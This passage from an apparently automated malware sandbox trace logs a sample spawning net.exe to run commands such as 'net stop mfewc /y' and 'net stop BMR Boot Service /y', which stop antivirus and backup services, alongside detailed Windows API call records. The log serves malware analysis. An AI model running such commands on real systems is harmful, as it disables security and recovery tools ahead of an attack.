"0x655dd000" os_pid = "0xda8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0xd2c" cmd_line = "C:\\WINDOWS\\system32\\net1 stop mfewc /y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 35 os_tid = 0xaf4 [0054.723] GetModuleHandleA (lpModuleName=0x0) returned 0x1220000 [0054.723] __set_app_type (_Type=0x1) [0054.723] __p__fmode () returned 0x76953c14 [0054.723] __p__commode () returned 0x769549ec [0054.723] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1226f20) returned 0x0 [0054.724] __getmainargs (in: _Argc=0x123f608, _Argv=0x123f60c, _Env=0x123f610, _DoWildCard=0, _StartInfo=0x123f61c | out: _Argc=0x123f608, _Argv=0x123f60c, _Env=0x123f610) returned 0 [0054.724] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0054.724] GetConsoleOutputCP () returned 0x1b5 [0054.726] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x1246fa0 | out: lpCPInfo=0x1246fa0) returned 1 [0054.727] SetThreadUILanguage (LangId=0x0) returned 0xc70409 [0054.730] sprintf_s (in: _DstBuf=0xf0f890, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0054.730] setlocale (category=0, locale=".437") returned="English_United States.437" [0054.731] GetStdHandle (nStdHandle=0xfffffff5) returned 0x344 [0054.731] GetStdHandle (nStdHandle=0xfffffff4) returned 0x90 [0054.731] GetCommandLineW () returned="C:\\WINDOWS\\system32\\net1 stop mfewc /y" [0054.731] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xf0f638, nSize=0x104 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0054.731] RtlAllocateHeap (HeapHandle=0x3440000, Flags=0x0, Size=0x5e) returned 0x3444228 [0054.731] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0054.732] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xf0f634 | out: Buffer=0xf0f634*=0x3447d18) returned 0x0 [0054.732] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xf0f630 | out: Buffer=0xf0f630*=0x3447b68) returned 0x0 [0054.732] __iob_func () returned 0x76952608 [0054.732] _fileno (_File=0x76952608) returned 0 [0054.732] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0054.732] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0054.732] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0054.732] _wcsicmp (_String1="config", _String2="stop") returned -16 [0054.732] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0054.732] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0054.732] _wcsicmp (_String1="file", _String2="stop") returned -13 [0054.732] _wcsicmp (_String1="files", _String2="stop") returned -13 [0054.732] _wcsicmp (_String1="group", _String2="stop") returned -12 [0054.732] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0054.732] _wcsicmp (_String1="help", _String2="stop") returned -11 [0054.732] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0054.732] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0054.732] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0054.732] _wcsicmp (_String1="session", _String2="stop") returned -15 [0054.732] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0054.732] _wcsicmp (_String1=0x1221ffc, _String2="stop") returned -15 [0054.732] _wcsicmp (_String1="share", _String2="stop") returned -12 [0054.732] _wcsicmp (_String1="start", _String2="stop") returned -14 [0054.732] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0054.732] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0054.732] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0054.732] _wcsicmp (_String1="accounts", _String2="mfewc") returned -12 [0054.732] _wcsicmp (_String1="computer", _String2="mfewc") returned -10 [0054.732] _wcsicmp (_String1="config", _String2="mfewc") returned -10 [0054.732] _wcsicmp (_String1="continue", _String2="mfewc") returned -10 [0054.732] _wcsicmp (_String1="cont", _String2="mfewc") returned -10 [0054.733] _wcsicmp (_String1="file", _String2="mfewc") returned -7 [0054.733] _wcsicmp (_String1="files", _String2="mfewc") returned -7 [0054.733] _wcsicmp (_String1="group", _String2="mfewc") returned -6 [0054.733] _wcsicmp (_String1="groups", _String2="mfewc") returned -6 [0054.733] _wcsicmp (_String1="help", _String2="mfewc") returned -5 [0054.733] _wcsicmp (_String1="helpmsg", _String2="mfewc") returned -5 [0054.733] _wcsicmp (_String1="localgroup", _String2="mfewc") returned -1 [0054.733] _wcsicmp (_String1="pause", _String2="mfewc") returned 3 [0054.733] _wcsicmp (_String1="session", _String2="mfewc") returned 6 [0054.733] _wcsicmp (_String1="sessions", _String2="mfewc") returned 6 [0054.733] _wcsicmp (_String1="sess", _String2="mfewc") returned 6 [0054.733] _wcsicmp (_String1="share", _String2="mfewc") returned 6 [0054.733] _wcsicmp (_String1="start", _String2="mfewc") returned 6 [0054.733] _wcsicmp (_String1="stats", _String2="mfewc") returned 6 [0054.733] _wcsicmp (_String1="statistics", _String2="mfewc") returned 6 [0054.733] _wcsicmp (_String1="stop", _String2="mfewc") returned 6 [0054.733] _wcsicmp (_String1="time", _String2="mfewc") returned 7 [0054.733] _wcsicmp (_String1="user", _String2="mfewc") returned 8 [0054.733] _wcsicmp (_String1="users", _String2="mfewc") returned 8 [0054.733] _wcsicmp (_String1="msg", _String2="mfewc") returned 13 [0054.733] _wcsicmp (_String1="messenger", _String2="mfewc") returned -1 [0054.733] _wcsicmp (_String1="receiver", _String2="mfewc") returned 5 [0054.733] _wcsicmp (_String1="rcv", _String2="mfewc") returned 5 [0054.733] _wcsicmp (_String1="netpopup", _String2="mfewc") returned 1 [0054.733] _wcsicmp (_String1="redirector", _String2="mfewc") returned 5 [0054.733] _wcsicmp (_String1="redir", _String2="mfewc") returned 5 [0054.733] _wcsicmp (_String1="rdr", _String2="mfewc") returned 5 [0054.733] _wcsicmp (_String1="workstation", _String2="mfewc") returned 10 [0054.733] _wcsicmp (_String1="work", _String2="mfewc") returned 10 [0054.733] _wcsicmp (_String1="wksta", _String2="mfewc") returned 10 [0054.733] _wcsicmp (_String1="prdr", _String2="mfewc") returned 3 [0054.733] _wcsicmp (_String1="devrdr", _String2="mfewc") returned -9 [0054.733] _wcsicmp (_String1="lanmanworkstation", _String2="mfewc") returned -1 [0054.733] _wcsicmp (_String1="server", _String2="mfewc") returned 6 [0054.733] _wcsicmp (_String1="svr", _String2="mfewc") returned 6 [0054.733] _wcsicmp (_String1="srv", _String2="mfewc") returned 6 [0054.733] _wcsicmp (_String1="lanmanserver", _String2="mfewc") returned -1 [0054.734] _wcsicmp (_String1="alerter", _String2="mfewc") returned -12 [0054.734] _wcsicmp (_String1="netlogon", _String2="mfewc") returned 1 [0054.734] _wcsupr (in: _String="mfewc" | out: _String="MFEWC") returned="MFEWC" [0054.734] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x34505f8 [0054.737] GetServiceKeyNameW (in: hSCManager=0x34505f8, lpDisplayName="MFEWC", lpServiceName=0x1248c28, lpcchBuffer=0xf0f5a4 | out: lpServiceName="", lpcchBuffer=0xf0f5a4) returned 0 [0054.737] _wcsicmp (_String1="msg", _String2="MFEWC") returned 13 [0054.737] _wcsicmp (_String1="messenger", _String2="MFEWC") returned -1 [0054.737] _wcsicmp (_String1="receiver", _String2="MFEWC") returned 5 [0054.738] _wcsicmp (_String1="rcv", _String2="MFEWC") returned 5 [0054.738] _wcsicmp (_String1="redirector", _String2="MFEWC") returned 5 [0054.738] _wcsicmp (_String1="redir", _String2="MFEWC") returned 5 [0054.738] _wcsicmp (_String1="rdr", _String2="MFEWC") returned 5 [0054.738] _wcsicmp (_String1="workstation", _String2="MFEWC") returned 10 [0054.738] _wcsicmp (_String1="work", _String2="MFEWC") returned 10 [0054.738] _wcsicmp (_String1="wksta", _String2="MFEWC") returned 10 [0054.738] _wcsicmp (_String1="prdr", _String2="MFEWC") returned 3 [0054.738] _wcsicmp (_String1="devrdr", _String2="MFEWC") returned -9 [0054.738] _wcsicmp (_String1="lanmanworkstation", _String2="MFEWC") returned -1 [0054.738] _wcsicmp (_String1="server", _String2="MFEWC") returned 6 [0054.738] _wcsicmp (_String1="svr", _String2="MFEWC") returned 6 [0054.738] _wcsicmp (_String1="srv", _String2="MFEWC") returned 6 [0054.738] _wcsicmp (_String1="lanmanserver", _String2="MFEWC") returned -1 [0054.738] _wcsicmp (_String1="alerter", _String2="MFEWC") returned -12 [0054.738] _wcsicmp (_String1="netlogon", _String2="MFEWC") returned 1 [0054.738] _wcsicmp (_String1="MFEWC", _String2="WORKSTATION") returned -10 [0054.738] _wcsicmp (_String1="MFEWC", _String2="LanmanWorkstation") returned 1 [0054.738] _wcsicmp (_String1="MFEWC", _String2="SERVER") returned -6 [0054.738] _wcsicmp (_String1="MFEWC", _String2="LanmanServer") returned 1 [0054.738] _wcsicmp (_String1="MFEWC", _String2="BROWSER") returned 11 [0054.738] _wcsicmp (_String1="MFEWC", _String2="BROWSER") returned 11 [0054.738] _wcsicmp (_String1="MFEWC", _String2="MESSENGER") returned 1 [0054.738] _wcsicmp (_String1="MFEWC", _String2="MESSENGER") returned 1 [0054.738] _wcsicmp (_String1="MFEWC", _String2="NETRUN") returned -1 [0054.738] _wcsicmp (_String1="MFEWC", _String2="NETRUN") returned -1 [0054.738] _wcsicmp (_String1="MFEWC", _String2="SPOOLER") returned -6 [0054.738] _wcsicmp (_String1="MFEWC", _String2="SPOOLER") returned -6 [0054.738] _wcsicmp (_String1="MFEWC", _String2="ALERTER") returned 12 [0054.738] _wcsicmp (_String1="MFEWC", _String2="ALERTER") returned 12 [0054.738] _wcsicmp (_String1="MFEWC", _String2="NETLOGON") returned -1 [0054.738] _wcsicmp (_String1="MFEWC", _String2="NETLOGON") returned -1 [0054.738] _wcsicmp (_String1="MFEWC", _String2="NETPOPUP") returned -1 [0054.738] _wcsicmp (_String1="MFEWC", _String2="NETPOPUP") returned -1 [0054.738] _wcsicmp (_String1="MFEWC", _String2="SQLSERVER") returned -6 [0054.738] _wcsicmp (_String1="MFEWC", _String2="SQLSERVER") returned -6 [0054.738] _wcsicmp (_String1="MFEWC", _String2="REPLICATOR") returned -5 [0054.738] _wcsicmp (_String1="MFEWC", _String2="REPLICATOR") returned -5 [0054.738] _wcsicmp (_String1="MFEWC", _String2="REMOTEBOOT") returned -5 [0054.739] _wcsicmp (_String1="MFEWC", _String2="REMOTEBOOT") returned -5 [0054.739] _wcsicmp (_String1="MFEWC", _String2="TIMESOURCE") returned -7 [0054.739] _wcsicmp (_String1="MFEWC", _String2="TIMESOURCE") returned -7 [0054.739] _wcsicmp (_String1="MFEWC", _String2="AFP") returned 12 [0054.739] _wcsicmp (_String1="MFEWC", _String2="AFP") returned 12 [0054.739] _wcsicmp (_String1="MFEWC", _String2="UPS") returned -8 [0054.739] _wcsicmp (_String1="MFEWC", _String2="UPS") returned -8 [0054.739] _wcsicmp (_String1="MFEWC", _String2="XACTSRV") returned -11 [0054.739] _wcsicmp (_String1="MFEWC", _String2="XACTSRV") returned -11 [0054.739] _wcsicmp (_String1="MFEWC", _String2="TCPIP") returned -7 [0054.739] _wcsicmp (_String1="MFEWC", _String2="TCPIP") returned -7 [0054.739] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x34508c8 [0054.739] OpenServiceW (hSCManager=0x34508c8, lpServiceName="MFEWC", dwDesiredAccess=0x84) returned 0x0 [0054.739] GetLastError () returned 0x424 [0054.739] CloseServiceHandle (hSCObject=0x34508c8) returned 1 [0054.740] wcscpy_s (in: _Destination=0x1247610, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0054.740] LoadLibraryExW (lpLibFileName="NETMSG", hFile=0x0, dwFlags=0x20) returned 0x1050002 [0054.740] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x1050002, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x1247c20, nSize=0x800, Arguments=0x12473d0 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0054.741] GetFileType (hFile=0x90) returned 0x2 [0054.741] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xf0f434 | out: lpMode=0xf0f434) returned 1 [0054.744] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x1247c20*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xf0f440, lpReserved=0x0 | out: lpBuffer=0x1247c20*, lpNumberOfCharsWritten=0xf0f440*=0x1e) returned 1 [0054.745] GetFileType (hFile=0x90) returned 0x2 [0054.745] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xf0f434 | out: lpMode=0xf0f434) returned 1 [0054.785] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x12212e4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xf0f440, lpReserved=0x0 | out: lpBuffer=0x12212e4*, lpNumberOfCharsWritten=0xf0f440*=0x2) returned 1 [0054.788] _ultow (in: _Dest=0x889, _Radix=15791240 | out: _Dest=0x889) returned="2185" [0054.788] FormatMessageW (in: dwFlags=0x2800, lpSource=0x1050002, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x1247c20, nSize=0x800, Arguments=0x12473d0 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0054.788] GetFileType (hFile=0x90) returned 0x2 [0054.788] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xf0f458 | out: lpMode=0xf0f458) returned 1 [0054.791] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x1247c20*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xf0f464, lpReserved=0x0 | out: lpBuffer=0x1247c20*, lpNumberOfCharsWritten=0xf0f464*=0x34) returned 1 [0054.810] GetFileType (hFile=0x90) returned 0x2 [0054.810] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xf0f458 | out: lpMode=0xf0f458) returned 1 [0054.817] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x12212e4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xf0f464, lpReserved=0x0 | out: lpBuffer=0x12212e4*, lpNumberOfCharsWritten=0xf0f464*=0x2) returned 1 [0054.818] NetApiBufferFree (Buffer=0x3447d18) returned 0x0 [0054.818] NetApiBufferFree (Buffer=0x3447b68) returned 0x0 [0054.818] GetCommandLineW () returned="C:\\WINDOWS\\system32\\net1 stop mfewc /y" [0054.818] exit (_Code=2) Thread: id = 36 os_tid = 0xfd4 Process: id = "15" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x86d4000" os_pid = "0x484" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xde0" cmd_line = "\"net.exe\" stop BMR Boot Service /y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 37 os_tid = 0xe04 Thread: id = 41 os_tid = 0xa1c Process: id = "16" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x81ba000" os_pid = "0x88c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0x484" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 38 os_tid = 0xf60 Thread: id = 39 os_tid = 0xe00 Thread: id = 40 os_tid = 0xd3c Process: id = "17" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x8336000" os_pid = "0xe38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0x484" cmd_line = "C:\\WINDOWS\\system32\\net1 stop BMR Boot Service /y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 42 os_tid = 0xeb0 [0055.530] GetModuleHandleA (lpModuleName=0x0) returned 0x1220000 [0055.530] __set_app_type (_Type=0x1) [0055.530] __p__fmode () returned 0x76953c14 [0055.530] __p__commode () returned 0x769549ec [0055.530] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1226f20) returned 0x0 [0055.530] __getmainargs (in: _Argc=0x123f608, _Argv=0x123f60c, _Env=0x123f610, _DoWildCard=0, _StartInfo=0x123f61c | out: _Argc=0x123f608, _Argv=0x123f60c, _Env=0x123f610) returned 0 [0055.530] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0055.530] GetConsoleOutputCP () returned 0x1b5 [0055.533] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x1246fa0 | out: lpCPInfo=0x1246fa0) returned 1 [0055.533] SetThreadUILanguage (LangId=0x0) returned 0xf50409 [0055.538] sprintf_s (in: _DstBuf=0x107f854, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0055.538] setlocale (category=0, locale=".437") returned="English_United States.437" [0055.539] GetStdHandle (nStdHandle=0xfffffff5) returned 0x344 [0055.540] GetStdHandle (nStdHandle=0xfffffff4) returned 0x90 [0055.540] GetCommandLineW () returned="C:\\WINDOWS\\system32\\net1 stop BMR Boot Service /y" [0055.540] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x107f5fc, nSize=0x104 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0055.540] RtlAllocateHeap (HeapHandle=0x3280000, Flags=0x0, Size=0x7c) returned 0x3284440 [0055.540] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0055.540] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x107f5f8 | out: Buffer=0x107f5f8*=0x3287cf0) returned 0x0 [0055.540] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x107f5f4 | out: Buffer=0x107f5f4*=0x3287cc0) returned 0x0 [0055.540] __iob_func () returned 0x76952608 [0055.540] _fileno (_File=0x76952608) returned 0 [0055.540] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0055.540] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0055.540] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0055.540] _wcsicmp (_String1="config", _String2="stop") returned -16 [0055.540] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0055.540] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0055.540] _wcsicmp (_String1="file", _String2="stop") returned -13 [0055.540] _wcsicmp (_String1="files", _String2="stop") returned -13 [0055.540] _wcsicmp (_String1="group", _String2="stop") returned -12 [0055.540] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0055.540] _wcsicmp (_String1="help", _String2="stop") returned -11 [0055.540] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0055.540] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0055.540] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0055.540] _wcsicmp (_String1="session", _String2="stop") returned -15 [0055.540] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0055.540] _wcsicmp (_String1=0x1221ffc, _String2="stop") returned -15 [0055.540] _wcsicmp (_String1="share", _String2="stop") returned -12 [0055.540] _wcsicmp (_String1="start", _String2="stop") returned -14 [0055.540] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0055.541] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0055.541] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0055.541] _wcsicmp (_String1="accounts", _String2="BMR") returned -1 [0055.541] _wcsicmp (_String1="computer", _String2="BMR") returned 1 [0055.541] _wcsicmp (_String1="config", _String2="BMR") returned 1 [0055.541] _wcsicmp (_String1="continue", _String2="BMR") returned 1 [0055.541] _wcsicmp (_String1="cont", _String2="BMR") returned 1 [0055.541] _wcsicmp (_String1="file", _String2="BMR") returned 4 [0055.541] _wcsicmp (_String1="files", _String2="BMR") returned 4 [0055.541] _wcsicmp (_String1="group", _String2="BMR") returned 5 [0055.541] _wcsicmp (_String1="groups", _String2="BMR") returned 5 [0055.541] _wcsicmp (_String1="help", _String2="BMR") returned 6 [0055.541] _wcsicmp (_String1="helpmsg", _String2="BMR") returned 6 [0055.541] _wcsicmp (_String1="localgroup", _String2="BMR") returned 10 [0055.541] _wcsicmp (_String1="pause", _String2="BMR") returned 14 [0055.541] _wcsicmp (_String1="session", _String2="BMR") returned 17 [0055.541] _wcsicmp (_String1="sessions", _String2="BMR") returned 17 [0055.541] _wcsicmp (_String1="sess", _String2="BMR") returned 17 [0055.541] _wcsicmp (_String1="share", _String2="BMR") returned 17 [0055.541] _wcsicmp (_String1="start", _String2="BMR") returned 17 [0055.541] _wcsicmp (_String1="stats", _String2="BMR") returned 17 [0055.541] _wcsicmp (_String1="statistics", _String2="BMR") returned 17 [0055.541] _wcsicmp (_String1="stop", _String2="BMR") returned 17 [0055.541] _wcsicmp (_String1="time", _String2="BMR") returned 18 [0055.541] _wcsicmp (_String1="user", _String2="BMR") returned 19 [0055.541] _wcsicmp (_String1="users", _String2="BMR") returned 19 [0055.541] _wcsicmp (_String1="msg", _String2="BMR") returned 11 [0055.541] _wcsicmp (_String1="messenger", _String2="BMR") returned 11 [0055.541] _wcsicmp (_String1="receiver", _String2="BMR") returned 16 [0055.541] _wcsicmp (_String1="rcv", _String2="BMR") returned 16 [0055.541] _wcsicmp (_String1="netpopup", _String2="BMR") returned 12 [0055.541] _wcsicmp (_String1="redirector", _String2="BMR") returned 16 [0055.541] _wcsicmp (_String1="redir", _String2="BMR") returned 16 [0055.541] _wcsicmp (_String1="rdr", _String2="BMR") returned 16 [0055.541] _wcsicmp (_String1="workstation", _String2="BMR") returned 21 [0055.541] _wcsicmp (_String1="work", _String2="BMR") returned 21 [0055.541] _wcsicmp (_String1="wksta", _String2="BMR") returned 21 [0055.541] _wcsicmp (_String1="prdr", _String2="BMR") returned 14 [0055.541] _wcsicmp (_String1="devrdr", _String2="BMR") returned 2 [0055.542] _wcsicmp (_String1="lanmanworkstation", _String2="BMR") returned 10 [0055.542] _wcsicmp (_String1="server", _String2="BMR") returned 17 [0055.542] _wcsicmp (_String1="svr", _String2="BMR") returned 17 [0055.542] _wcsicmp (_String1="srv", _String2="BMR") returned 17 [0055.542] _wcsicmp (_String1="lanmanserver", _String2="BMR") returned 10 [0055.542] _wcsicmp (_String1="alerter", _String2="BMR") returned -1 [0055.542] _wcsicmp (_String1="netlogon", _String2="BMR") returned 12 [0055.542] _wcsicmp (_String1="accounts", _String2="Boot") returned -1 [0055.542] _wcsicmp (_String1="computer", _String2="Boot") returned 1 [0055.542] _wcsicmp (_String1="config", _String2="Boot") returned 1 [0055.542] _wcsicmp (_String1="continue", _String2="Boot") returned 1 [0055.542] _wcsicmp (_String1="cont", _String2="Boot") returned 1 [0055.542] _wcsicmp (_String1="file", _String2="Boot") returned 4 [0055.542] _wcsicmp (_String1="files", _String2="Boot") returned 4 [0055.542] _wcsicmp (_String1="group", _String2="Boot") returned 5 [0055.542] _wcsicmp (_String1="groups", _String2="Boot") returned 5 [0055.542] _wcsicmp (_String1="help", _String2="Boot") returned 6 [0055.542] _wcsicmp (_String1="helpmsg", _String2="Boot") returned 6 [0055.542] _wcsicmp (_String1="localgroup", _String2="Boot") returned 10 [0055.542] _wcsicmp (_String1="pause", _String2="Boot") returned 14 [0055.542] _wcsicmp (_String1="session", _String2="Boot") returned 17 [0055.542] _wcsicmp (_String1="sessions", _String2="Boot") returned 17 [0055.542] _wcsicmp (_String1="sess", _String2="Boot") returned 17 [0055.542] _wcsicmp (_String1="share", _String2="Boot") returned 17 [0055.542] _wcsicmp (_String1="start", _String2="Boot") returned 17 [0055.542] _wcsicmp (_String1="stats", _String2="Boot") returned 17 [0055.542] _wcsicmp (_String1="statistics", _String2="Boot") returned 17 [0055.542] _wcsicmp (_String1="stop", _String2="Boot") returned 17 [0055.542] _wcsicmp (_String1="time", _String2="Boot") returned 18 [0055.542] _wcsicmp (_String1="user", _String2="Boot") returned 19 [0055.542] _wcsicmp (_String1="users", _String2="Boot") returned 19 [0055.542] _wcsicmp (_String1="msg", _String2="Boot") returned 11 [0055.542] _wcsicmp (_String1="messenger", _String2="Boot") returned 11 [0055.542] _wcsicmp (_String1="receiver", _String2="Boot") returned 16 [0055.542] _wcsicmp (_String1="rcv", _String2="Boot") returned 16 [0055.542] _wcsicmp (_String1="netpopup", _String2="Boot") returned 12 [0055.542] _wcsicmp (_String1="redirector", _String2="Boot") returned 16 [0055.542] _wcsicmp (_String1="redir", _String2="Boot") returned 16 [0055.543] _wcsicmp (_String1="rdr", _String2="Boot") returned 16 [0055.543] _wcsicmp (_String1="workstation", _String2="Boot") returned 21 [0055.543] _wcsicmp (_String1="work", _String2="Boot") returned 21 [0055.543] _wcsicmp (_String1="wksta", _String2="Boot") returned 21 [0055.543] _wcsicmp (_String1="prdr", _String2="Boot") returned 14 [0055.543] _wcsicmp (_String1="devrdr", _String2="Boot") returned 2 [0055.543] _wcsicmp (_String1="lanmanworkstation", _String2="Boot") returned 10 [0055.543] _wcsicmp (_String1="server", _String2="Boot") returned 17 [0055.543] _wcsicmp (_String1="svr", _String2="Boot") returned 17 [0055.543] _wcsicmp (_String1="srv", _String2="Boot") returned 17 [0055.543] _wcsicmp (_String1="lanmanserver", _String2="Boot") returned 10 [0055.543] _wcsicmp (_String1="alerter", _String2="Boot") returned -1 [0055.543] _wcsicmp (_String1="netlogon", _String2="Boot") returned 12 [0055.543] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0055.543] SetThreadUILanguage (LangId=0x0) returned 0xf50409 [0055.544] LoadLibraryExW (lpLibFileName="neth.dll", hFile=0x0, dwFlags=0x822) returned 0x11d0002 [0055.550] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc5d, dwLanguageId=0x0, lpBuffer=0x107f0d0, nSize=0x0, Arguments=0x107f0cc | out: lpBuffer="ŀ̩ć觘ģౝ") returned 0xff [0055.557] wcstok (in: _String="CONTINUE: CONT$\r\nFILE: FILES$\r\nGROUP: GROUPS$\r\nREPLICATOR: REPL, REPLICATOR$\r\nSESSION: SESSIONS, SESS$\r\nSTATISTICS: STATS$\r\nUSER: USERS$\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR$\r\nSERVER: SVR, SRV$\r\n", _Delimiter="$", _Context=0x1eb | out: _String="CONTINUE: CONT", _Context=0x1eb) returned="CONTINUE: CONT" [0055.557] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nFILE: FILES" [0055.558] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nGROUP: GROUPS" [0055.558] wcstok (in: 